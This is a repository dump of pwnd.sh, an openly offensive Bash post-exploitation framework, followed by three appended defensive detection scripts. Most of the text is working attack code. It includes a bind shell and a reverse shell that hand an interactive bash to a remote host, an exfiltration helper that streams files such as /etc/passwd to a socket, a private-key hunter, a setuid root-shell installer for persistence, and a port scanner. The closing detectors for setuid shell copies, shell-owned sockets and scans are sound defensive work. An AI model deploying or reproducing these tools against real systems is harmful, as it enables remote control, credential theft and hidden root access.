Repository: SafeBreach-Labs/pwndsh
Branch: master
Commit: 1239754a8dfd
Files: 12
Total size: 44.3 KB

Directory structure:
gitextract_ydkfa3ea/
├── LICENSE
├── README.rst
├── bin/
│   ├── compile_pwnd_sh.sh
│   └── pwnd.sh
└── pwnd/
    ├── _bootstrap.bash
    ├── _pwnd.bash
    ├── assets/
    │   └── priv_keys.bash
    ├── c2/
    │   ├── bindshell.bash
    │   └── reverseshell.bash
    ├── exfiltration/
    │   └── over_socket.bash
    ├── persistence/
    │   └── rootshell.bash
    └── reconnaissance/
        └── portscanner.bash

================================================
FILE CONTENTS
================================================

================================================
FILE: LICENSE
================================================
Copyright (c) 2016, SafeBreach
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its contributors
   may be used to endorse or promote products derived from this software
   without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

================================================
FILE: README.rst
================================================
PWND.SH
=======

pwnd.sh is a post-exploitation framework (and an interactive shell) developed in Bash shell scripting. It aims to be cross-platform (Linux, Mac OS X, Solaris etc.) and with little to no external dependencies.

Slides from SkyDogCon 2016 are `available here `_

Install:
--------

.. code::

    $ cd bin/
    $ ./compile_pwnd_sh.sh

This will generate a file called ``pwnd.sh``

.. code::

    $ ls -la pwnd.sh
    -rw-r--r--@ 1 ikotler  staff  7823 Oct 19 16:55 pwnd.sh

Now let's get pwnd!

.. code::

    $ source pwnd.sh
    Pwnd v1.0.0, Itzik Kotler (@itzikkotler)]
    Type `help' to display all the pwnd commands.
    Type `help name' to find out more about the pwnd command `name'.
    (pwnd)$

Tested:
-------

* Mac OS X El Capitan (10.11.3) using GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin15)
* Ubuntu 14.04.3 LTS using GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
* Oracle Solaris 11.3 X86 using GNU bash, version 4.1.17(1)-release (i386-pc-solaris2.11)

Features/Bugs:
--------------

Found a bug? Have a good idea for improving PWND.SH? Head over to `PWND.SH's github `_ page and create a new ticket or fork.

If you want to contact us please email: labs (at) safebreach (dot) com.

License:
--------

BSD 3-Clause

================================================
FILE: bin/compile_pwnd_sh.sh
================================================
#!/usr/bin/env bash

##########
# Consts #
##########

DEFAULT_OUTPUT_FILENAME="pwnd.sh"

#############
# Functions #
#############

# Append a module to the output file, dropping every line that starts with `#'
# (license headers and notes) so the generated script stays compact
normalize_and_append() {
    grep -v "^#" < "$1" >> "$2"
    echo " " >> "$2"
}

###############
# Entry Point #
###############

output_filename="$DEFAULT_OUTPUT_FILENAME"

if [ ! -z "${1-}" ]; then
    output_filename="$1"
fi

# Start with a shebang line
echo "#!/usr/bin/env bash" > "$output_filename"

# Core definitions first: the module glob below skips names starting with `_'
normalize_and_append "../pwnd/_pwnd.bash" "$output_filename"

for module in $(find ../pwnd -type f -name "[a-zA-Z0-9]*.bash"); do
    normalize_and_append "$module" "$output_filename"
done

# The interactive bootstrap (help, banner, prompt) goes last
normalize_and_append "../pwnd/_bootstrap.bash" "$output_filename"

ls -la "$output_filename"

================================================
FILE: bin/pwnd.sh
================================================
#!/usr/bin/env bash
IFS=$' \t\n'

PWND_VERSION="1.0.0"

_pwnd_commands=()

pwnd_register_cmd() {
    _pwnd_commands+=("$1;$2")
}

pwnd_isroot() {
    local retval=0
    if [ $EUID -ne 0 ]; then
        echo "You must be a root user"
        retval=1
    fi
    return $retval
}

__hunt_privkeys_usage() {
    cat << "EOF"
usage: hunt_privkeys [dir ...]
    Find all private keys that are textually encoded.

    Each DIR argument will be recursively searched.

    Default directories are: `~root' and `dirname $HOME'
EOF
    return 0
}

hunt_privkeys() {
    local dirs
    if [ $# -eq 0 ]; then
        dirs=(~root "$(dirname "$HOME")")
    else
        dirs=("$@")
    fi
    for directory in "${dirs[@]}"; do
        echo "Scanning $directory ..."
        grep -ril "PRIVATE KEY" "$directory" 2> /dev/null
    done
    echo "Done!"
}

pwnd_register_cmd hunt_privkeys "Find all private keys that are textually encoded"

__bindshell_usage() {
    cat << "EOF"
usage: bindshell port [arg ...]
    A simple yet "cross platform" implementation of bindshell using nc, mkfifo and bash.

    PORT is a TCP (by default) port number.
    Each ARG will be passed directly to nc
EOF
    return 0
}

bindshell() {
    if [ -z "${1-}" ]; then
        __bindshell_usage
        return 0
    fi
    local tempfile=$(mktemp -u)
    local port="$1"
    mkfifo "$tempfile"
    bash -i 2>&1 < "$tempfile" | nc "${@:2}" -l "$port" > "$tempfile"
}

pwnd_register_cmd bindshell "A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and bash"

__reverseshell_usage() {
    cat << "EOF"
usage: reverseshell [-u] host port
    A simple yet "cross platform" implementation of reverseshell using bash sockets.

    HOST can be IPv4 address or hostname.
    PORT is a TCP (by default) port number.

    The `-u' if specified says use UDP instead of the default option of TCP.
EOF
    return 0
}

reverseshell() {
    local host proto port
    if [ "${1-}" == "-u" ]; then
        if [ -z "${3-}" ]; then
            __reverseshell_usage
            return 0
        fi
        host="$2"
        proto="udp"
        port="$3"
    else
        if [ -z "${2-}" ]; then
            __reverseshell_usage
            return 0
        fi
        proto="tcp"
        port="$2"
        host="$1"
    fi
    bash -i >& "/dev/$proto/$host/$port" 0>&1
}

pwnd_register_cmd reverseshell "A simple yet \"cross platform\" implementation of reverseshell using bash sockets"

__over_socket_usage() {
    cat << "EOF"
usage: over_socket [-u] host port
    A simple yet "cross platform" implementation of generic TCP and UDP socket using bash sockets.

    HOST can be IPv4 address or hostname.
    PORT is a TCP (by default) port number.

    The `-u' if specified says use UDP instead of the default option of TCP.

    Example:

    $ cat /etc/passwd | over_socket localhost 80

    This will open connection to localhost at port 80 TCP and will send over the content of `/etc/passwd'
EOF
    return 0
}

over_socket() {
    local host proto port
    if [ "${1-}" == "-u" ]; then
        if [ -z "${3-}" ]; then
            __over_socket_usage
            return 0
        fi
        host="$2"
        proto="udp"
        port="$3"
    else
        if [ -z "${2-}" ]; then
            __over_socket_usage
            return 0
        fi
        proto="tcp"
        port="$2"
        host="$1"
    fi
    cat /dev/stdin > "/dev/$proto/$host/$port"
}

pwnd_register_cmd over_socket "A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets"

__install_rootshell_usage() {
    cat << "EOF"
usage: install_rootshell [/path/to/shell] [/path/to/rootshell]
    A simple yet "cross platform" implementation of rootshell using chmod and bash.

    /PATH/TO/SHELL is a path to shell (default: $SHELL).
    /PATH/TO/ROOTSHELL is path to where to install the rootshell (default: mktemp -u)
EOF
    return 0
}

install_rootshell() {
    pwnd_isroot || return 1
    local shellfile=${1-$SHELL}
    local rootshell=${2-$(mktemp -u)}
    cp "$shellfile" "$rootshell"
    chmod u+s "$rootshell"
    ls -la "$rootshell"
}

pwnd_register_cmd install_rootshell "A simple yet \"cross platform\" implementation of rootshell using \`chmod u+s' and bash"

__portscanner_usage() {
    cat << "EOF"
usage: portscanner host [port/proto ...], [port-range/proto ...]
    A simple yet "cross platform" implementation of portscanner using bash sockets.

    HOST can be IPv4 address or hostname.
    PORT can be any port number.
    PROTO can be `tcp' or `udp'.
    PORTS is comma-separated PORTs.
    PORT-RANGE is any range between 1 to 65535 following `/tcp' or `/udp' postfix.

    Examples:

    $ portscanner localhost 80/tcp

    This will check if TCP port 80 is open on localhost.

    $ portscanner localhost 53/tcp,53/udp

    This will check if TCP port 53 and UDP port 53 are opened on localhost.

    $ portscanner localhost 1-1024/tcp,69/udp

    This will check if TCP ports 1 to 1024 are opened and if UDP port 69 is opened on localhost.
EOF
    return 0
}

__portscanner_timeout() {
    # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time
    # NOTE: a single string argument makes perl hand the command to /bin/sh -c, so the
    # /dev/tcp redirection only works where /bin/sh is bash (not dash, as on Debian/Ubuntu)
    `perl -e 'alarm shift; open STDERR, "> /dev/null"; exec @ARGV' "$@"`
    # `` works better than $() in Linux when it comes to suppressing 'Alarm' message _AND_ still having alarm terminating the process
}

portscanner() {
    if [ -z "${2-}" ]; then
        __portscanner_usage
        return
    fi
    local host="$1"
    local ports=()
    local csv_args=()
    IFS=',' read -ra csv_args <<< "${@:2}"
    for arg in "${csv_args[@]}"; do
        case "$arg" in
            *-*)
                # i.e. 1-1024/tcp
                local range_ports=()
                IFS='/' read -ra range_ports <<< "$arg"
                IFS='-' read start end <<< "${range_ports[0]}"
                for ((port=start; port <= end; port++)); do
                    ports+=("$port/${range_ports[1]}")
                done
                ;;
            *,*)
                # i.e. '53/tcp, 53/udp' (unreachable: csv_args was already split on `,')
                IFS=',' read -ra ports <<< "$arg"
                ;;
            *)
                # i.e. '80/tcp'
                ports+=("$arg")
                ;;
        esac
    done
    for port in "${ports[@]}"; do
        local conn_parameter=()
        IFS='/' read -ra conn_parameter <<< "$port"
        __portscanner_timeout 1 "echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}" && echo "port $port is open" || echo "port $port is closed"
    done
}

pwnd_register_cmd portscanner "A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets"

__bash_help_usage() {
    echo "Execute bash builtin help and pass any argument to it"
}

bash_help() {
    local help_topic=""
    if [ ! -z "${1-}" ]; then
        help_topic="$1"
    fi
    bash -c "help $help_topic"
}

__help_usage() {
    cat << "EOF"
usage: help [name]
    Display helpful information about pwnd commands.

    If NAME is specified, gives detailed help on command NAME,
    otherwise a list of the pwnd commands is printed.

    To access bash builtin help use: `bash_help'
EOF
    return 0
}

help() {
    if [ ! -z "${1-}" ]; then
        eval "__$1_usage" 2> /dev/null
        if [ $? == 127 ]; then
            echo "pwnd-help: no help topics match \`$1'.  Try \`help' to see all the defined commands"
            return 127
        fi
    else
        cat << EOF
pwnd, version ${PWND_VERSION} (${MACHTYPE})
These pwnd commands are defined internally.  Type \`help' to see this list.
Type \`help name' to find out more about the pwnd command \`name'.

EOF
        for pwnd_command in "${_pwnd_commands[@]-}"; do
            IFS=';' read -ra pwnd_cmd_parameters <<< "$pwnd_command"
            # IFS=';' pwnd_cmd_parameters=($pwnd_command)
            printf "%-19s -- %s\n" "${pwnd_cmd_parameters[0]}" "${pwnd_cmd_parameters[1]}"
        done
    fi
}

cat << EOF
[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]
Type \`help' to display all the pwnd commands.
Type \`help name' to find out more about the pwnd command \`name'.
EOF

PS1="(\[\033[92m\]\[\033[1m\]pwnd\[\033[0m\]\[\033[39m\])${PS1-}"

================================================
FILE: pwnd/_bootstrap.bash
================================================
# _bootstrap.sh, interactive pwnd shell

__bash_help_usage() {
    echo "Execute bash builtin help and pass any argument to it"
}

bash_help() {
    local help_topic=""
    if [ ! -z "${1-}" ]; then
        help_topic="$1"
    fi
    bash -c "help $help_topic"
}

__help_usage() {
    cat << "EOF"
usage: help [name]
    Display helpful information about pwnd commands.

    If NAME is specified, gives detailed help on command NAME,
    otherwise a list of the pwnd commands is printed.

    To access bash builtin help use: `bash_help'
EOF
    return 0
}

help() {
    if [ ! -z "${1-}" ]; then
        # Every registered command ships a __<name>_usage function; 127 means none exists
        eval "__$1_usage" 2> /dev/null
        if [ $? == 127 ]; then
            echo "pwnd-help: no help topics match \`$1'.  Try \`help' to see all the defined commands"
            return 127
        fi
    else
        cat << EOF
pwnd, version ${PWND_VERSION} (${MACHTYPE})
These pwnd commands are defined internally.  Type \`help' to see this list.
Type \`help name' to find out more about the pwnd command \`name'.

EOF
        for pwnd_command in "${_pwnd_commands[@]-}"; do
            IFS=';' read -ra pwnd_cmd_parameters <<< "$pwnd_command"
            # IFS=';' pwnd_cmd_parameters=($pwnd_command)
            printf "%-19s -- %s\n" "${pwnd_cmd_parameters[0]}" "${pwnd_cmd_parameters[1]}"
        done
    fi
}

###############
# Entry Point #
###############

cat << EOF
[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]
Type \`help' to display all the pwnd commands.
Type \`help name' to find out more about the pwnd command \`name'.
EOF

PS1="(\[\033[92m\]\[\033[1m\]pwnd\[\033[0m\]\[\033[39m\])${PS1-}"

================================================
FILE: pwnd/_pwnd.bash
================================================
IFS=$' \t\n'

##########
# Consts #
##########

PWND_VERSION="1.0.0"

####################
# Global variables #
####################

# Each entry is "name;description", consumed by `help' in _bootstrap.bash
_pwnd_commands=()

#############
# Functions #
#############

pwnd_register_cmd() {
    _pwnd_commands+=("$1;$2")
}

pwnd_isroot() {
    local retval=0
    if [ $EUID -ne 0 ]; then
        echo "You must be a root user"
        retval=1
    fi
    return $retval
}

================================================
FILE: pwnd/assets/priv_keys.bash
================================================
# priv_keys, Find all private keys that are textually encoded

__hunt_privkeys_usage() {
    cat << "EOF"
usage: hunt_privkeys [dir ...]
    Find all private keys that are textually encoded.

    Each DIR argument will be recursively searched.

    Default directories are: `~root' and `dirname $HOME'
EOF
    return 0
}

hunt_privkeys() {
    local dirs
    if [ $# -eq 0 ]; then
        dirs=(~root "$(dirname "$HOME")")
    else
        dirs=("$@")
    fi
    for directory in "${dirs[@]}"; do
        echo "Scanning $directory ..."
        grep -ril "PRIVATE KEY" "$directory" 2> /dev/null
    done
    echo "Done!"
}

pwnd_register_cmd hunt_privkeys "Find all private keys that are textually encoded"

================================================
FILE: pwnd/c2/bindshell.bash
================================================
# bindshell, A simple yet "cross platform" implementation of bindshell using nc, mkfifo and /bin/bash

__bindshell_usage() {
    cat << "EOF"
usage: bindshell port [arg ...]
    A simple yet "cross platform" implementation of bindshell using nc, mkfifo and bash.

    PORT is a TCP (by default) port number.
    Each ARG will be passed directly to nc
EOF
    return 0
}

bindshell() {
    if [ -z "${1-}" ]; then
        __bindshell_usage
        return 0
    fi
    local tempfile=$(mktemp -u)
    local port="$1"
    mkfifo "$tempfile"
    bash -i 2>&1 < "$tempfile" | nc "${@:2}" -l "$port" > "$tempfile"
}

pwnd_register_cmd bindshell "A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and bash"

================================================
FILE: pwnd/c2/reverseshell.bash
================================================
# reverseshell, A simple yet "cross platform" implementation of reverseshell using bash sockets

__reverseshell_usage() {
    cat << "EOF"
usage: reverseshell [-u] host port
    A simple yet "cross platform" implementation of reverseshell using bash sockets.

    HOST can be IPv4 address or hostname.
    PORT is a TCP (by default) port number.

    The `-u' if specified says use UDP instead of the default option of TCP.
EOF
    return 0
}

reverseshell() {
    local host proto port
    if [ "${1-}" == "-u" ]; then
        if [ -z "${3-}" ]; then
            __reverseshell_usage
            return 0
        fi
        host="$2"
        proto="udp"
        port="$3"
    else
        if [ -z "${2-}" ]; then
            __reverseshell_usage
            return 0
        fi
        proto="tcp"
        port="$2"
        host="$1"
    fi
    bash -i >& "/dev/$proto/$host/$port" 0>&1
}

pwnd_register_cmd reverseshell "A simple yet \"cross platform\" implementation of reverseshell using bash sockets"

================================================
FILE: pwnd/exfiltration/over_socket.bash
================================================
# over_socket, A simple yet "cross platform" implementation of generic TCP and UDP socket using bash sockets

__over_socket_usage() {
    cat << "EOF"
usage: over_socket [-u] host port
    A simple yet "cross platform" implementation of generic TCP and UDP socket using bash sockets.

    HOST can be IPv4 address or hostname.
    PORT is a TCP (by default) port number.

    The `-u' if specified says use UDP instead of the default option of TCP.

    Example:

    $ cat /etc/passwd | over_socket localhost 80

    This will open connection to localhost at port 80 TCP and will send over the content of `/etc/passwd'
EOF
    return 0
}

over_socket() {
    local host proto port
    if [ "${1-}" == "-u" ]; then
        if [ -z "${3-}" ]; then
            __over_socket_usage
            return 0
        fi
        host="$2"
        proto="udp"
        port="$3"
    else
        if [ -z "${2-}" ]; then
            __over_socket_usage
            return 0
        fi
        proto="tcp"
        port="$2"
        host="$1"
    fi
    cat /dev/stdin > "/dev/$proto/$host/$port"
}

pwnd_register_cmd over_socket "A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets"

================================================
FILE: pwnd/persistence/rootshell.bash
================================================
# # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # rootshell, A simple yet "cross platform" implementation of rootshell using `chmod u+s' and bash __install_rootshell_usage() { cat << "EOF" usage: install_rootshell [/path/to/shell] [/path/to/rootshell] A simple yet "cross platform" implementation of rootshell using chmod and bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL is path to where to install the rootshell (default: mktemp -u) EOF return 0 } install_rootshell() { pwnd_isroot || return 1 local shellfile=${1-$SHELL} local rootshell=${2-$(mktemp -u)} cp "$shellfile" "$rootshell" chmod u+s "$rootshell" ls -la "$rootshell" } pwnd_register_cmd install_rootshell "A simple yet \"cross platform\" implementation of rootshell using \`chmod u+s' and bash" ================================================ FILE: pwnd/reconnaissance/portscanner.bash ================================================ ########################################################################### # # # Copyright (c) 2016, SafeBreach # # All rights reserved. # # # # Redistribution and use in source and binary forms, with or without # # modification, are permitted provided that the following conditions are # # met: # # # # 1. Redistributions of source code must retain the above # # copyright notice, this list of conditions and the following # # disclaimer. # # # # 2. 
Redistributions in binary form must reproduce the # # above copyright notice, this list of conditions and the following # # disclaimer in the documentation and/or other materials provided with # # the distribution. # # # # 3. Neither the name of the copyright holder # # nor the names of its contributors may be used to endorse or promote # # products derived from this software without specific prior written # # permission. # # # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS # # AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, # # INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. # # IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR # # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL # # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE # # GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER # # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # # ########################################################################### # portscanner, A simple yet "cross platform" implementation of TCP and UDP port scanner using bash sockets __portscanner_usage() { cat << "EOF" usage: portscanner host [port/proto ...], [port-range/proto ...]> A simple yet "cross platform" implementation of portscanner using bash sockets. HOST can be IPv4 address or hostname. PORT can be any port number. PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. PORT-RANGE is any range between 1 to 65535 following `/tcp' or `/udp' postfix. Examples: $ portscanner localhost 80/tcp This will check if TCP port 80 is open on localhost. 
$ portscanner localhost 53/tcp,53/udp This will check if TCP port 53 and UDP port 53 are opened on localhost. $ portscanner localhost 1-1024/tcp,69/udp This will check if TCP ports 1 to 1024 are opened and if UDP port 69 is opened on localhost. EOF return 0 } # TODO: Add alternative implementations for `timeout'-like functionality __portscanner_timeout() { # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time `perl -e 'alarm shift; open STDERR, "> /dev/null"; exec @ARGV' "$@"` # `` works better than $() in Linux when it comes to supressing 'Alarm' message _AND_ still having alarm terminating the process } # Based on http://www.catonmat.net/blog/tcp-port-scanner-in-bash/ portscanner() { if [ -z "${2-}" ]; then __portscanner_usage return fi local host="$1" local ports=() local csv_args=() IFS=',' read -ra csv_args <<< "${@:2}" for arg in "${csv_args[@]}"; do case "$arg" in *-*) # i.e. 1-1024/tc local range_ports=() IFS='/' read -ra range_ports <<< "$arg" IFS='-' read start end <<< "${range_ports[0]}" for ((port=start; port <= end; port++)); do ports+=("$port/${range_ports[1]}") done ;; *,*) # i.e. '53/tcp, 53/udp' IFS=',' read -ra ports <<< "$arg" ;; *) # i.e. '80/tcp' ports+=("$arg") ;; esac done for port in "${ports[@]}"; do local conn_parameter=() IFS='/' read -ra conn_parameter <<< "$port" __portscanner_timeout 1 "echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}" && echo "port $port is open" || echo "port $port is closed" done } pwnd_register_cmd portscanner "A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets"
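The install_rootshell command in pwnd/persistence/rootshell.bash leaves a very specific artifact behind: a setuid regular file that is a byte-for-byte copy of a shell already present on the system, dropped by default at a mktemp-style path. The following is an added defensive example and is not part of pwnd.sh: it walks the given directories for setuid files and reports the ones whose content matches a known shell binary. The list of shell paths in KNOWN_SHELLS is an assumption about typical installs; missing entries are skipped, so extend it for the hosts you audit.

```bash
#!/usr/bin/env bash
# Added defensive example, not part of pwnd.sh.
# A rootshell built with `cp "$SHELL" /tmp/x && chmod u+s /tmp/x` is a setuid
# file whose content is identical to a shell that is already installed, so
# comparing every setuid file against the known shells finds the copy.

# Candidate shells to compare against (assumed typical paths; missing ones are skipped).
KNOWN_SHELLS="/bin/sh /bin/bash /bin/dash /bin/ksh /bin/zsh /usr/bin/bash /usr/bin/zsh"

# find_suid_shell_copies DIR...
# Prints "<setuid file> <matching shell>" for each setuid regular file under
# the given directories that is byte-for-byte identical to a known shell.
# Returns 0 if at least one copy was found, 1 otherwise.
find_suid_shell_copies() {
    local found=1 file shell
    # -perm -4000 keeps only files with the setuid bit; -xdev stays on one filesystem
    while IFS= read -r file; do
        [ -n "$file" ] || continue
        for shell in $KNOWN_SHELLS; do
            [ -f "$shell" ] || continue
            if cmp -s "$file" "$shell"; then
                printf '%s %s\n' "$file" "$shell"
                found=0
                break
            fi
        done
    done <<EOF
$(find "$@" -xdev -type f -perm -4000 2>/dev/null)
EOF
    return "$found"
}

# Typical audit of the usual drop locations (run as root to see every file):
# find_suid_shell_copies /tmp /var/tmp /dev/shm /home
```

Run it as root over the whole filesystem for a full audit, or over /tmp, /var/tmp, /dev/shm and home directories for a quick check. Any setuid file in a temporary directory deserves a look even when it matches nothing in the list, because legitimate setuid binaries live in system directories.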
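Both over_socket (pwnd/exfiltration/over_socket.bash) and portscanner (pwnd/reconnaissance/portscanner.bash) never spawn a client program: bash itself opens the connection when a redirection targets /dev/tcp/HOST/PORT or /dev/udp/HOST/PORT, so the resulting socket is owned by a shell process. That is rare for legitimate traffic and easy to pick out of `ss -tunp` output. The filter below is an added defensive example, not code from pwnd.sh; the ss output it parses is constructed, and the set of process names treated as shells is an assumption.

```bash
#!/usr/bin/env bash
# Added defensive example, not part of pwnd.sh.
# over_socket and portscanner open their connections from inside bash (the
# /dev/tcp and /dev/udp redirections), so the socket's owning process is a
# shell rather than a network client such as curl or ssh.

# Constructed sample of `ss -tunp` output (not captured from a real host).
SAMPLE_SS_OUTPUT='tcp ESTAB 0 0 10.0.0.5:51004 10.0.0.20:443 users:(("curl",pid=1301,fd=5))
tcp ESTAB 0 0 10.0.0.5:49212 10.0.0.9:80 users:(("bash",pid=4242,fd=3))
udp ESTAB 0 0 10.0.0.5:50123 10.0.0.9:53 users:(("bash",pid=4242,fd=4))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))'

# flag_shell_sockets < ss-output
# Prints one line per socket whose owning process name is a shell:
#   pid=<pid> proc=<name> <netid> <local> -> <peer>
flag_shell_sockets() {
    # ss -tunp columns: Netid State Recv-Q Send-Q Local Peer Process
    awk -v shells='^(bash|sh|dash|ksh|zsh)$' '
        /users:\(\(/ {
            # users:(("bash",pid=4242,fd=3)) -> name=bash, pid=4242
            match($0, /users:\(\("[^"]*",pid=[0-9]+/)
            entry = substr($0, RSTART, RLENGTH)
            name = entry; sub(/.*\(\("/, "", name); sub(/".*/, "", name)
            pid = entry;  sub(/.*pid=/, "", pid)
            if (name ~ shells)
                printf "pid=%s proc=%s %s %s -> %s\n", pid, name, $1, $5, $6
        }'
}

# Live use:   ss -tunp | flag_shell_sockets
# Sample run: printf '%s\n' "$SAMPLE_SS_OUTPUT" | flag_shell_sockets
```

A connected UDP socket created through /dev/udp shows up as ESTAB just like the TCP one, which is why the filter keys on the owning process name rather than on state. A shell that legitimately owns a socket is unusual enough that each hit is worth tying back to its parent process and command line.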
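Seen from the target, portscanner above probes ports one at a time with a full TCP connect (or a UDP send) and a one second timeout per port, so a sweep appears as one connection attempt per destination port from the same source within a short window. The function below is an added defensive example, not part of pwnd.sh: it reads iptables/nftables style kernel LOG lines from stdin, counts distinct destination ports per source, and reports sources over a threshold. The log lines are constructed and the threshold is an assumption to tune per environment.

```bash
#!/usr/bin/env bash
# Added defensive example, not part of pwnd.sh.
# portscanner connects to each port in turn, so a scan leaves one LOG entry
# per destination port from one source. Counting distinct PROTO/DPT pairs per
# SRC separates a sweep from a client that repeatedly hits one service.

# Constructed sample of kernel LOG lines (not captured from a real host).
# 10.0.0.9 sweeps several ports; 10.0.0.7 only talks to 443, twice.
SAMPLE_FW_LOG='Oct 19 16:55:01 host kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=49212 DPT=21 SYN
Oct 19 16:55:01 host kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=49213 DPT=22 SYN
Oct 19 16:55:02 host kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=49214 DPT=23 SYN
Oct 19 16:55:03 host kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=49215 DPT=25 SYN
Oct 19 16:55:03 host kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.5 PROTO=TCP SPT=40001 DPT=443 SYN
Oct 19 16:55:04 host kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=49216 DPT=80 SYN
Oct 19 16:55:04 host kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.5 PROTO=TCP SPT=49217 DPT=443 SYN
Oct 19 16:55:05 host kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.5 PROTO=TCP SPT=40002 DPT=443 SYN
Oct 19 16:55:05 host kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.5 PROTO=UDP SPT=50123 DPT=69 LEN=24'

# count_scanned_ports THRESHOLD < log
# Prints "<src> probed <n> distinct ports" for every source whose number of
# distinct PROTO/DPT pairs exceeds THRESHOLD.
count_scanned_ports() {
    awk -v threshold="$1" '
        {
            src = ""; dpt = ""; proto = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/)        src   = substr($i, 5)
                else if ($i ~ /^DPT=/)   dpt   = substr($i, 5)
                else if ($i ~ /^PROTO=/) proto = substr($i, 7)
            }
            if (src == "" || dpt == "") next
            # count each source/proto/port combination once, however often it repeats
            key = src SUBSEP proto "/" dpt
            if (!(key in seen)) { seen[key] = 1; ports[src]++ }
        }
        END {
            for (s in ports)
                if (ports[s] > threshold + 0)
                    printf "%s probed %d distinct ports\n", s, ports[s]
        }'
}

# Sample run: printf '%s\n' "$SAMPLE_FW_LOG" | count_scanned_ports 5
```

The one second timeout in portscanner also means a range scan is slow and spread over time, so when applying this to real logs, bucket the lines by a window long enough to cover the ranges you care about rather than by single seconds.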
